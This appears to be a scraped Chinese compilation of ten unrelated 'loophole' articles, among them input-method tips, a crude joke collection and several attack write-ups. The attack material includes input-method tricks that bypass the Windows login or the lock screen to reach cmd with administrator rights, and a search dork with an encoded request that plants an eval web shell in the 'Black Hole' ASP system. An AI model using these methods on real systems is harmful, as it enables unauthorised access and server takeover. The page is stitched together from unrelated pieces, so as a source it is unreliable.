极点五笔输入法一个漏洞

下面就是小编整理的极点五笔输入法一个漏洞，本文共10篇，希望大家喜欢。本文原稿由网友“半黑半白”提供。

篇1：极点五笔输入法一个漏洞

发现极点五笔输入法一个漏洞

用此漏洞可以绕过系统登录密码，从而进入系统，

测试系统：       vista

测试输入法版本：编译版本：.2.26.0.98

具体过程是这样的：选出此输入法后，右击输入法浮动图标，弹出输入法设置、管理工具、手工造词...、切换皮肤、使用说明、版本信息，

这些条目中第一个输入法设置可以另存就可以进入系统目录，进入目录后就可以慢慢的操作了.........

这个漏洞和以前微软的智能ABC曾经有过的漏洞是一样的。没测试其他的输入法，可能第三方开发的输入法在这个安全方面都没有注意到。

篇2：极点五笔输入法介绍

极点五笔，是一个很好的五笔输入法, 不仅也五笔输入,还可以不用切换就同时拼音输入. 全称为“极点中文汉字输入平台”，是一款免费的多功能五笔拼音输入软件，同时，极点完美支持一笔、二笔等各种“型码”及“音型码”输入法，在线打字的时候能极大的提高录入的速度。

功能特色

五笔拼音同步录入: 会五笔打五笔不会五笔打拼音，且不影响盲打。

屏幕取词：随选随造，可以包含任意标点与字符。

屏幕查询：在屏幕上选词后复制到剪切板再按它就行了。

在线删词：有重码时可以使用此快捷键删除不需要的词组。

在线调频：当要调整重码的顺序时按此键，同时也可选用自动调频。

删除刚刚录入的词组：如果想从系统词库中删除刚刚录入的词组，按此键即可。

自动智能造词：首次以单字录入，第二次后即可以词组形式录入。

在线造词 在输入的过程中为系统词库添加新词组；

在线删词 在输入的过程中删除每户词库中的词组；

在线调频 在输入的过程中调整系统词库的词序；

自动造词 系统自动识别单字或复合字符串为词组并追加到系统词库中；

特殊输出 支持各种特殊文本符号、文本符号串的输出；

短文输出 带时间日期或换行的文本字符串的输出；

笔画输入 以中文笔画作为索引的编码输出；

自定义软键盘 自定义软键盘键位所对应的文本符号；

开放性码表 允许用户自定义编码方案；

简入繁出 简体字编码输出繁体文字；

快捷命令 在输入的过程中用特殊的编码进入设置界面和执行功能切换；

命令直通车 以自定义的编码执行Windows命令行；

屏幕查询 以鼠标等操作自动读取内存中的中文字符中，并返回读音、编码等相关信息；

临时GBK功能 允许系统默认的GB 2312编码方案临时输出GBK编码集；

编码反查 拼音及五笔编码互查；

快捷时间、日期输入 以编码now、week、time等编码输出对应的当前中文式样，并可自定义格式。

界面换肤

字典查询

插件扩展

使用说明与打字教程:

1、状态栏菜单： 在输入法的状态栏或汉字候选窗上点击鼠标右键出现下面的菜单。

菜单名称 内容说明

输入法设置

图形设置模式 通过图形界面来设置极点。这里可以配置极点的功能，如用“，。”翻页或选候选字等。

专家设置模式 是图形设置模式的补充，这里包含了极点的所有系统设置。建议高级用户使用。

极点预设的设置

极点预设了两种配置，“五笔高手”适合五笔熟手或之前使用过极点、加加等的用户使用；“五笔新手”适合传统五笔用户使用。

设置另存为 将极点设置成符合自己输入习惯后，将这种设置保存下来。

管理工具

极点词库维护 用于生成或导出极点的词库，批量加词与删词也在此维护工具中。具体内容见此功能的提示窗口。

切换词库 如果系统中安装了多套输入方案：如86版五笔和98版五笔，可以通过此项来进行切换

备份词库与设置 备份极点当前的系统设置与词库，

恢复词库与设置 恢复极点的系统设置与词库

切换皮肤

隐藏状态栏

用于隐藏极点的状态栏

你已安装的皮肤 列出你已安装的极点皮肤，可通过此菜单快速切换皮肤。

注： 还可通过“图形设置模式”中的“界面设置”选择皮肤和修改各种外观设置。

现用皮肤信息

显示现在皮肤的作者等相关信息

使用说明

用于显示本文件。

版本信息

显示极点的版本信息号。

2、图形界面设置

设置项目、设置项含义、输入法设置、基本设置

启用编码逐渐提示

选中此项，当你录入编码a时，除显示a对应的“工”字外，极点还会提示所有编码以a开头的字和词组，如：“式a 节b”等。

启用单字输入模式

选中此项，只能输入单字，不能输入词组。

提示系统已有词组

选中此项，如词库中有“中国”一词，但你以“中”、“国”的方式来录入，系统会提示你。如果提示多次你仍不用此词组，则此词组会自动隐藏（是否隐藏受“高级设置”中的“智能隐藏词组”选项来定）

空码时清除已输入编码

启用此项，如果你输入一个3码以上的空码时，极点会清除已输入的编码并等待你输入新编码；否则极点等待你修改已输入编码，或继续输入新编码。

启用自动调频

启用此项，有重码时被选择的候选项自动调位至首位。

注：但单字不参与这种调频，而只能以Ctrl+序号的方式调整。

字符半角时空格全角

在编辑WORD文档时，段首通常要缩进2个汉字位置，选用此项可以方便的实现此功能。

显示词库中全部字词

极点默认安装完后，仅检索与显示常用的字词，像一些广东的白话字并不显示。如果要输入这些字需要选中此选项。

重码或空码时发声提示

选中此项，当你录入空码或有重码时，极点会发声提示你。如果同时选中“使用声音文件”，则使用声卡提示，否则使用机器的扬声器提示。

启用词组联想功能

是否启用词组联想。

高级设置

智能隐藏不用词组

选中此项，被分开录入的词组及始终不选用的重码会被自动隐藏。对于单字重码，不被选用的单字会被自动转为“生僻字”。

Shift+字母转英文

按Shift＋字母自动转到临时英文状态，按回车后输出所输入的英文并返回中文输入状态。

启用打字音效功能

选中此项，你的计算机就像一台打字机（五笔新手学习可以时使用此功能）。

全码时才显示词组

选中此项，前3时仅能显示、输入单字，4码以后才能显示输入词组。

打开英文时为英文

选中此项，按Ctrl+空格打开极点时，极点处于英文输入状态栏。

回车键用于

①清除编码：清除已输入的编码及候选项，等待你重新录入

②编码上屏：输出已录入的编码并等待你输入新码。

篇3：极点五笔输入法使用技巧

相信好多朋友都在用极点五笔输入法了，很多时候大家都只是用它来进行文字的录入，其实作为一款免费的五笔输入法，极点五笔输入法也有特色的功能，下面就来看看吧!

1.选择输入法风格

输入法安装成功后即可使用，默认使用的是极点的输入法状态栏和候选窗，即在当前窗口的标题栏右侧显示输入法状态条，方形单行候选窗，如果你用惯了传统五笔或拼音加加的状态条和候选窗，可以按下列步骤进行切换：

①.右键单击极点的状态栏，如果状态栏已经隐藏显示，也可以在候选窗上右键单击，弹出如图1所示的系统菜单，在“预置风格”的子菜单中单击自己喜好的风格，其中“用户原有风格”菜单项是修改输入法风格后增加的菜单，初次使用是无此菜单项；而“五笔加加”的输入法风格和和拼音加加相同的。

②.接着我们对状态栏进行一些细化设置，在系统菜单选择“输入法设置”，在弹出的设置窗口中点击左侧目录树的“状态栏”，此时可以在右侧窗口进行选择状态栏皮肤、自动定位、设置隐藏热键及状态栏字号等。

友情提示：

输入法皮肤是保存在“C:Program Filesfreewbskin”文件夹中（本文以默认安装路径为例，请读者自行更改为实际安装路径，下同），每个皮肤图片对应一个配置文本文件（.ini），喜欢个性的你还可以到wbfans.yeah.net下载其它皮肤，将下载得到的皮肤图片和配置文本一起保存到skin文件夹即可。

③.再在设置窗口中左侧目录树单击“候选窗”，可以设置候选窗的字号、背景图、透明度、窗口风格、颜色等，并可以在“候选窗颜色”的图片中即时预览效果。

友情提示：

候选窗的默认背景图保存在“C:Program Filesfreewbackground”文件夹中，读者可以选择适合作背景的位图图片（.bmp）添加到此文件夹中。

2.输出设置和输入法状态

一般五笔只能输出默认的简体中文汉字，而极点中文却能够用简体中文的编码输出繁体中文汉字和大五码汉字，使用方法是选择系统菜单的“输出设置”，选择一种输出方案，或者记住其热键，比如在输入过程中需要输入繁体字，可以直接按下“Ctrl＋J”（大五码是“Ctrl＋Shift＋”），这样就免除选择菜单的麻烦。要注意的是选择繁体中文输出模式不能直接直接切换为大五码输出，得切换回原先的简体中文后再进行切换；大五码输出切换为繁体中文也得同样间接切换。

前文提过极点中文集成拼音输入法，不过极点中文并不能切换为纯粹的拼音输入法，只能同时输入五笔字词与拼音单字（五笔拼音状态），或者按“”键后进入临时拼音状态（五笔临拼）录入。有趣的是，在五笔拼音模式下，同样可以按“”键后进入临时拼音状态。当需要输入一连串的英文时，可以按分号键“;”进入英文输入状态，另外在文档中按“Shift＋字母”输出大写字母时也会自动进入英文输入状态，当英文输出到候选窗后，回车上屏。如果频繁输入单个大写字母时，也得按回车后才上屏，这里我们可以设置为大写字母即时输出，方法是在设置窗口中撤消的“高级设置”的“字母自动英文”复选框即可，这样就能直接输出单个大写字母，而不是转换为英文输入状态。

友情提示：

快捷英文按键是可以设置的，设置的方法是设置窗口中切换到“基本设置”，在“快捷英文热键”下拉框进行选择具体按键。

3.软键盘切换有妙技

虽然可以从系统菜单选择“软键盘”，其实可以直接在输入过程中按“Shift＋Esc”激活软键盘，如果当前的软键盘并不是需要的，需要切换，只需按住“Shift＋Esc”连续切换为其它类型的软键盘，一般用左手尾指住“Shift”键，然后再用中指连续按“Esc”进行切换。如果要关闭软键盘，只按“Esc”键即可。

4.反查编码及读音

在五笔输入过程中，经常会输入一些不懂得字读音的汉字，如“~”字。现在利用极点中文的拼音反查即可解决此问题：使用极点中文输出“~”字后按“Ctrl＋？”，极点会弹出一个提示框，就可以知道读“bu0”音。

5.快速输入年月日、时间

年月日、时间甚至星期都是经常输入的词组，在极点中文中，作者已经加强了此方面的设计。不过在使用前我们还得清楚输入的对应编码，比如要输入“1月1日”（不包括引号，下同），可以在极点中文中按分号键“;”进入英文输入状态，接着输入“n1y1r”（nyr就是汉字年月日拼音首字母），回车即可上屏，如果按分号键或“Shift＋回车”可以选择汉字样式，即“二○○八年一月一日”。另外，也可以只输入年份、月份或日期。

虽然很多文档编辑软件有插入当前日期的功能，不过最快捷的莫过于直接输入转换。在极点中文中，可以输入“znyr”（采用“z”码可以避免与五笔编码重复）输出当前年月日，同样有阿拉伯数字和汉字样式；如果只要输入当前年份、日期（阿拉伯数字样式）或星期，编码直接对应英文单词，即“year”、“date”和“week”。另外，输入当前时间有两种编码――“time”和“now”，其中前者只输出时分，后者则还输出当前年月日。

6.自定义添加词组

再丰富的词库也满足不了个人的专有词组，为此，很多输入法都有添加词组的功能，不过使用方法太繁琐。极点在此方面下了非常大的功夫，具有强大的造词威力（极点中称添加词组为造词），

总得来说，有在线造词、自动造词、高级造词和批量造词四种，对应也有在线删词、删除自动造词。

A.在线造词和高级造词

①.先数一下新词组/短句的总字数，然后正确地一个字/词组输出新词组/短句，接着按分号键“；”后进入快捷英文输入状态，再输入总字数的阿拉伯数字，最后按单引号“‘”键，回车确认即可完成造词。比如要添加新短句“年年有此时，岁岁有今朝！”，包括标点总共13字，那么先用极点正确按顺序输出这个短句，接着输入“；12’”后候选窗将提示此短句，回车确认后，在弹出的对话框中输入词组编码即可

②.先将新词组/短句复制到剪切板，注意不能包括回车符，然后输入“；0‘”（数字0），回车确认。

③.首先还是正确按顺序输出新词组/短句，接着按“Ctrl＋=”热键，弹出候选窗，通过“←”和“→”光标键增减构成词组的字，回车确认。

友情提示：

以上三种在线造词造词都可以按“←”和“→”光标键进行调整字符，如果要删除候选窗某些字符，先将需要删除的一个字符移到候选窗最左端，然后按Del键删除，再按下一个要删除的一个字符移到最左端，按Del键，依此循环操作。回车确认后，极点检测到候选窗中包含有标点或其它特殊符号，都会弹出图6的自定义词组编码窗口；当然，如果要为全汉字的词组自定义词组编码，也可以通过按“Ctrl＋回车”键进行自定义编码。

由于在线造词可以添加标点和特殊字符（其中将空格转换为“”，回车转换为“”），所以可以将自己个人的身份证号、E-mail、地址、手机号等个人信息作为一个词组并自定义编码，这样在网络上填表时可以输入就非常迅速了。鉴于不同网站的安全，可以再“制造”一套自己的假“信息”，根据网站可信程度选择输入真假信息。

在造词过程中，如果要撤消造词，可以随时按ESC键。经笔者实验，在极点中文4.1版中，第①种在线造词方法最多只可以总共12个字符的词组/短句，而第②种和第③种在线造词方法则可以最多200个汉字或400个半角字符。

B.自动造词

除了手工在线造词外，自动造词功能大大减少了用户的劳动力，不过由于输入过程中难免会输错汉字/词组，所以自动造词也会添加一些错误不需要的词组。

要启用自动造词有功能，可以在设置窗口中点击“词语设置”，选中“启用自动词组功能”复选框即以单字方式添加词组，而“自动词组即选即存”启用后会自动保存选择的临时词组，“词组参与自动造词”启用后可以将一次输入的词组参与自动造词，最后的自动词组最大词长可以限制自动词组的造词可以包含的最多

默认设置下，在候选窗中词组若是红色，说明此词组是极点自动造词产生的，但并未加入系统词库。如果要删除这样的词组，可以在候选窗中按“Ctrl+Shift＋词的序号”热键进行删除。比如在图8中，要删除“输住”词组，按“Ctrl+Shift＋2”即可。

C.批量造词

顾名思义，批量造词就是导入事先已经添加好自定义词组的文本文件。使用方法是鼠标右键点击状态栏，在弹出的系统菜单选择“管理工具→批量造词”，选择目标词组文本文件，如果文本文件格式正确，回车后，极点自动开始导入这些词组。

友情提示：极点对批量造词的文本文件要求文本文件的字符必须是纯文本、每个词组单独为一行且最大长度不超过200个汉字或400个半角字符。

7.重复输入

我们经常会输入重复词组，比如“学习学习”、“研究研究”等。一般情况下，我们得输入两次相同词组。不过在极点中，可以只输入一次词组即可，即输出一个词组后，再输入“Z”字符，此时候选窗提示刚刚输入的词组，按空格上买即可。

8。字典功能

我们利用极点五笔输入法中的字典可以查询字意、读音等。在使用时先选中要查询的字词，然后单击极点五笔输入法的状态栏上的“放大镜”按钮，就可以在弹出的“极点查询”窗口中看到相应文字的五笔编码、汉语读音和字意了，这可比调用金山词霸等软件快捷多了。此外，我们也可以在“极点查询”窗口中的输入框中输入要查询的文字，单击“查询”按钮得到查询结果。

9.巧用命令

极点五笔提供了丰富的命令操作，熟练应用可以大大提高我们的效率。下面笔者为大家举两个例子:右击极点五笔输入法的标题栏，选择“管理工具”子菜单下的“用户码表”命令，在“file $f[auto]c:/autoexec.bat”下面输入“dizi $F[通讯地址]d:/通讯地址.TXT”，单击“存盘退出”菜单项退出编辑。以后只要输入dizi，选择“[通讯地址]”，就可以方便的调用“通讯地址.TXT”中的内容了，不再需要费事地复制、粘贴了。这一功能对经常要在文本中输入固定的内容的朋友们来说真是太有用了。

右击极点五笔输入法的标题栏，选择“管理工具”子菜单下的“用户码表”命令，仍在“file $f[auto]c:/autoexec.bat”下添加“zhaopian $P[我的照片]d:/我的照片.BMP”，单击“存盘退出”菜单项退出编辑。以后在Word或其他文本编辑软件中插入“我的照片”时，输入“zhaopian”，选择“我的照片”，就可以直接在相应软件中插入该图片了。其实每个人都可以通过命令模式实现自己的快捷操作，大家赶紧试试吧!

篇4：Ubuntu下安装极点五笔输入法

刚刚安装好了 Ubuntu 12.04，但是没有五笔的日子实在不好过，WINDOWS下用习惯了极点五笔，本以为极点的作者不出Linux版的，结果在网上一搜，居然有高手想到引用极点五笔的字典实现可以同时打拼音和五笔，废话少说，下面看如何操作

刚刚安装好了 Ubuntu 12.04，但是没有五笔的日子实在不好过，WINDOWS下用习惯了极点五笔，本以为极点的作者不出Linux版的，结果在网上一搜，居然有高手想到引用极点五笔的字典实现可以同时打拼音和五笔，废话少说，下面看如何操作：

ibus下用法

在终端中执行如下操作

sudo wget www.xiit.cn/wp-content/uploads//03/vissible-ibus.tar.gz

tar -zxvf vissible-ibus.tar.gz

sudo cp vissible.db /usr/share/ibus-table/tables

sudo cp vissible.gif /usr/share/ibus-table/icons

完成后，在点任务栏中那个键盘小图标，在下拉菜单选“重新重启” 重启ibus输入法，然后再点一下键盘小图标并在下拉菜单中选“首选项”，然后在弹出的窗口中点击“输入法”选项卡，接着点“选择输入法”>“汉语”，然后点“添加” 极点五笔，OK！

篇5：输入法技巧放送：极点五笔技巧两则

相信好多朋友都在用极点五笔输入法了，很多时候大家都只是用它来进行文字的录入，其实作为一款免费的五笔输入法，极点五笔输入法5.0新增了数项独创的很有特色的功能，下面就跟笔者来看看吧!

字典功能

我们利用极点五笔输入法中的字典可以查询字意、读音等，在使用时先选中要查询的字词，然后单击极点五笔输入法的状态栏上的“放大镜”按钮，就可以在弹出的“极点查询”窗口中看到相应文字的五笔编码、汉语读音和字意了，这可比调用金山词霸等软件快捷多了。此外，我们也可以在“极点查询”窗口中的输入框中输入要查询的文字，单击“查询”按钮得到查询结果。

巧用命令

极点五笔提供了丰富的命令操作，熟练应用可以大大提高我们的效率。下面笔者为大家举两个例子:右击极点五笔输入法的标题栏，选择“管理工具”子菜单下的“用户码表”命令，在“file $f[auto]c:\\autoexec.bat”下面输入“dizi $F[通讯地址]d:\\通讯地址.TXT”，单击“存盘退出”菜单项退出编辑(如图2)，

以后只要输入dizi，选择“[通讯地址]”，就可以方便的调用“通讯地址.TXT”中的内容了，不再需要费事地复制、粘贴了。这一功能对经常要在文本中输入固定的内容的朋友们来说真是太有用了。

右击极点五笔输入法的标题栏，选择“管理工具”子菜单下的“用户码表”命令，仍在“file $f[auto]c:\\autoexec.bat”下添加“zhaopian $P[我的照片]d:\\我的照片.BMP”，单击“存盘退出”菜单项退出编辑。以后在Word或其他文本编辑软件中插入“我的照片”时，输入“zhaopian”，选择“我的照片”，就可以直接在相应软件中插入该图片了。其实每个人都可以通过命令模式实现自己的快捷操作，大家赶紧试试吧!

篇6：0day 搜狗输入法漏洞如何获取系统权限

教你0day 搜狗输入法漏洞如何简单获取系统权限：

无意发现了一个很严重的漏洞，和当年3389 输入法漏洞相似， 不过暂时不影响未系统未加载搜狗输入法（未登录系统）。如果远程服务器装了 搜狗，登录系统后加载了搜狗，而又未及时注销或kill掉搜狗输入法直接关闭了远程连接，那么这些server 就很危险咯。

测试环境：

OS: windows 7 ultimate

搜狗输入法 4.3 正式版

漏洞过程描述：

当windows加载了搜狗输入法后（登录系统后），锁定计算机(cltr+alt+del)，

切换为搜狗输入法，输入拼音字母出现搜狗输入法工具条后，点击搜索，会调用 iexplorer.exe 。接下来就可以直接在IE地址栏调用system32目录并运行cmd，如果登录账号为administrators 组。则直接获取本机系统权限。

篇7：如何阻止 通过Windows输入法漏洞登录系统？

启动Windows2000进行到登录验证的提示界面时，任何用户都可以打开各种输入法的帮助栏，并且利用其中具有的一些功能访来问文件系统，也就是说用户可以绕过Windows2000的用户登录验证机制，并且能以最高管理员权限访问整个系统。所以说这个漏洞的危害性是很大的。而且当用户进入系统后，还可以利用TerminalServer远程通信这个漏洞对系统进行攻击。

默认的Windows2000操作系统自带的输入法中有这个漏洞的是:智能ABC、微软拼音、内码、全拼、双拼、郑码，

防范输入法漏洞的方法是:

1.把不需要的输入法删除掉。

2.因为不能把所有的自带输入法都删除，所以用户使用有漏洞的输入法时，应该把输入法的帮助文件删除掉。这些帮助文件通常在Windows2000的安装目录下（C:\\WINNT）的help目录下，对应的帮助文件是:

（1）Winime.chm:输入法操作指南

（2）Winsp.chm:双拼输入法帮助

（3）Winzm.chm:郑码输入法帮助

（4）Winpy.chm:全拼输入法帮助

（5）Wingb.chm:内码输入法帮助

3.Microsoft公司针对此问题发布了MS00-069安全公告，打上最新的输入法漏洞的补丁可以解决问题。

篇8：搞笑短信明显有一个漏洞

最新搞笑短信明显有一个漏洞

解放思想，遇室具进，贴近裙中，开脱进取，混入肌层，实施求事，集中精力，丸强拼搏，直抓湿干，坚持不泄，性福愉快，完事如意。

一日军事演习，炮火引燃一堆麦杆垛，跑出一对男女，男的骂到：妈的，不就这点小事，派出所来就行了，还用炮轰？

公母两乌龟完事后，相约第二年再来。第二年公龟很早就来了，但看见母龟早已睡在原来的地方等起了。公龟问：你怎么这么早就来了。母乌龟怒道：你龟儿去年走时怎么不把我翻回来。

一天牧场农夫在牛棚里给牛济奶，只听外边有咚咚的脚步声，

母牛连忙说，别摸了我老公回来了~

大哥，您别摸了，您摸了上面摸下面，毛都让您给摸掉了，那么嫩的皮都被您摸流水了！您以后让俺怎么卖啊.........这桃可都是新鲜的啊....

你美你最美脾酒的肚子乌龟的腿大象的'鼻子麻雀的嘴

伸着脖子迈着腿哭着喊着要学美要问学美成不成那要看你心诚不诚

一科长嫖妓，对老板说：要初女，不是处女不干．来一美女，科长问：是处女吗？美女答道：说不是处女吧，我还没生过孩子，说是处女吧，可干这活的～～～勉强就算是个副初吧！

产房传喜讯，喜得一个大胖孙子，爷爷高兴得急忙跑进产房，看着刚出生的孙子，笑嘻嘻的问刚出生的孙子：“孙子，你还认识不认识爷爷了？”

一个士兵练习爬树,忽然他从树上掉下来,军官问他为什么掉下来,他说有两之松鼠跑到他裤裆里去了，这我还忍了，可是他们进去了说:咱们把果子分了吧.

一女学生找男老师批改作文，老师看了看，说：恩，这个，体材很丰满，前面有两点非常美，不过往下看有一些毛草，再往下明显有一个漏洞。。。女学生问：怎么办？老师沉吟一下：日后再说！

父教儿;母亲是祖国,父是政府,保母是社会,你是人民.某夜,儿起尿尿见父与保姆苟合,被夫打.儿哭;祖国在沉睡,政府在搞社会,社会在呻吟,人民在流泪.

如果在贫穷的地方，你一定要记住自己是主席家乡人，要把随时值钱的项链、耳环、戒指等全部分送给贫苦人民。记者采访，你要严肃地说：“我在发宝!”

篇9：一个密码的沦陷漏洞预警

说社工强大,一点都没错,这次渗透让我有一点点成功感.，某日无聊在朋友那边拿了些QQ号玩.(都是6位一代的)，先看了一些都不行,哎现在死TX搞的什么规定要挂很长时间才能改.

要到改的时间了,主人早发现了.

就社工下. 看了下QQ空间,貌似没什么利用的..

篇10：黑洞的ASP上线系统的一个漏洞

作者：toby57

在默认的情况下，利用该漏洞可得到上线系统所在服务器的webshell

ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp

写入配置时对参数未作检查，setip.asp相关代码

<%

strIP=Trim(Request.QueryString(“Ip”))

strPort=Trim(Request.QueryString(“Port”))

strType=Trim(Request.QueryString(“Type”))

if strType=“0” then

strIP=Request.ServerVariables(“REMOTE_HOST”)

end if

sql=“select * from Info where strMark='Main'”

rs.Open sql,conn,1,3

if not rs.eof or not rs.bof then

rs(“strIPAddress”)=strIP

rs(“strPort”)=strPort

rs(“strType”)=strType

rs.update

'不要修改下面的反馈字符.否则程序不知道是否更新成功.

response.write “update success!”

else

response.write “update fail!”

end if

set rs=nothing

conn.close

set conn=nothing以“inurl:setip.asp”为关键字找了一个测试地址xxx.com/blackhole/setip.asp

提交

xxx.com/blackhole/setip.asp?Type=%A9%E0%B0Y%CE%DB%A0%84%9F%A8%94%B3%AC%9B%A1%C5%A1%D4%A9%CD%90%F7

这样就插入了EVAL一句话

ipdat.asp

知乎一个存储型跨站漏洞及修复

手心输入法怎么导出词库

网络精英培训网的漏洞

规章制度执行有漏洞

安全软件也会存有漏洞

极点五笔输入法一个漏洞.doc

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档